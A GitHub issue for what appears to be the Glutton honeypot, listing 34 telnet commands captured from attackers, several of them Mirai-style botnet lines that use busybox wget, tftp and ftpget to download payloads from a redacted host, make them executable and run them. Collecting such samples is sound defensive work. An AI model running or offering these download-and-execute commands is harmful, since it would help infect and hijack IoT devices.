Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Fetch samples by telnet #80

Open
glaslos opened this issue Jun 3, 2017 · 1 comment
Open

Fetch samples by telnet #80

glaslos opened this issue Jun 3, 2017 · 1 comment

Comments

@glaslos
Copy link
Member

glaslos commented Jun 3, 2017

read /bin/busybox telnet x.x.x.x 6745 > test; /bin/busybox chmod 777 test ; ./test

@nassimabedi
Copy link
Contributor

These are some samples of telnet command that I have seen in Glutton.
Commands are arranged in order of number of repetitions from high to low.

sample 1:
/bin/busybox ECCHI\

sample 2:
/bin/busybox wget; /bin/busybox tftp; /bin/busybox ECCHI

sample 3:
enable

sample 4:
shell

sample 5:
/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/dev' > /dev/.nippon; /bin/busybox cat /dev/.nippon; /bin/busybox rm /dev/.nippon

sample 6:
/bin/busybox ps; /bin/busybox ECCHI

sample 7:
/bin/busybox cat /proc/mounts; /bin/busybox ECCHI

sample 8:
rm /dev/.t; rm /dev/.sh; rm /dev/.human

sample 9:
/bin/busybox cat /bin/echo

sample 10:
cd /dev/

sample 11:
cat /proc/cpuinfo; /bin/busybox ECCHI

sample 12:
./dvrHelper telnet.arm; /bin/busybox IHCCE

sample 13:
rm -rf upnp; > dvrHelper; /bin/busybox ECCHI

sample 14:
./dvrpelper telnet.arm.bot.wget; /bin/busybox IHCCE

sample 15:
./dvrpelper telnet.arm7.bot.wget; /bin/busybox IHCCE

sample 16:

/bin/busybox wget http://x.x.x.x:80/bins/mirai.arm -O - > dvrHelper; /bin/busybox chmod 777 dvrHelper; /bin/busybox ECCHI
/bin/busybox wget http://x.x.x.x:80/bins/mirai.arm7 -O - > dvrHelper; /bin/busybox chmod 777 dvrHelper; /bin/busybox ECCHI

sample 17:
dd bs=52 count=1 if=.s || cat .s

sample 18:
dd bs=52 count=1 if=.s || cat .s || while read i; do echo $i; done < .s

sample 19:
/bin/busybox wget; /bin/busybox 81c46036wget; /bin/busybox echo -ne '\\x0181c46036\\x7f'; /bin/busybox printf '\\00281c46036\\177'; /bin/echo -ne '\\x0381c46036\\x7f'; /usr/bin/printf '\\00481c46036\\177'; /bin/busybox tftp; /bin/busybox 81c46036tftp;
sample 20:
/bin/busybox echo -e '\\x72\\x79\\x75\\x6b/dev' > /dev/.nippon; /bin/busybox cat /dev/.nippon; /bin/busybox rm /dev/.nippon

sample 21:
ping 127.0.0.1 -c1 && sh\x00

sample 22:
/bin/busybox kill -9 0

sample 23:
/bin/busybox cat /bin/busybox || while read i; do /bin/busybox echo $i; done < /bin/busybox || /bin/busybox dd if=/bin/busybox bs=22 count=1

sample 24:
>/dev/netslink/.file && cd /dev/netslink/ && /bin/busybox rm -rf .file

sample 25:
>/var/tmp/.file && cd /var/tmp/ && /bin/busybox rm -rf .file

sample 26:
/bin/busybox cp /bin/echo hnaiteibn; >hnaiteibn; /bin/busybox chmod 777 hnaiteibn; /bin/busybox HENTAI

sample 27:
>/dev/netslink/.t && cd /dev/netslink/

sample 28:
/bin/busybox RipPEEP\x00

sample 29:
>/var/tmp/.t && cd /var/tmp/

sample 30:
cd /tmp || cd /var/run || cd /dev/shm || cd /mnt || cd /var;rm -f *;busybox wget http://x.x.x.x/.sh; sh .sh; wget1 http://x.x.x.x/.sh; sh .sh; busybox tftp -r tftp.sh -g ; sh tftp.sh; busybox tftp -c get tftp2.sh; sh tftp2.sh

sample 31:
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://x.x.x.x/bins.sh; busybox wget http://x.x.x.x/bins.sh; chmod 777 bins.sh; sh bins.sh; tftp x.x.x.x -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g x.x.x.x; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 x.x.x.x ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf bins.sh tftp1.sh tftp2.sh ftp1.sh;exit

sample 32:
/bin/busybox cp /bin/busybox xhgyeshowm; /bin/busybox cp /bin/busybox gmlocerfno; >xhgyeshowm; >gmlocerfno; /bin/busybox chmod 777 xhgyeshowm gmlocerfno

sample 33:
cd /tmp || cd /var/run || cd /dev/shm || cd /mnt || cd /var;mv -f /usr/bin/-wget /usr/bin/wget;mv -f /usr/sbin/-wget /usr/bin/wget;mv -f /bin/-wget /bin/wget;mv -f /sbin/-wget /bin/wget;wget http://x.x.x.x/bin.sh; sh bin.sh; wget1 http://x.x.x.x/bin2.sh; sh bin2.sh; tftp -r tftp.sh -g x.x.x.x; sh tftp.sh; tftp x.x.x.x -c get tftp2.sh; sh tftp2.sh;mv /bin/wget /bin/-wget;mv /usr/sbin/wget /usr/sbin/-wget;mv /usr/bin/wget /usr/bin/-wget;mv /sbin/wget /bin/-wget

sample 34:
./upnp; ./dvrHelper telnet.arm7; /bin/busybox IHCCE

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
Development

No branches or pull requests

2 participants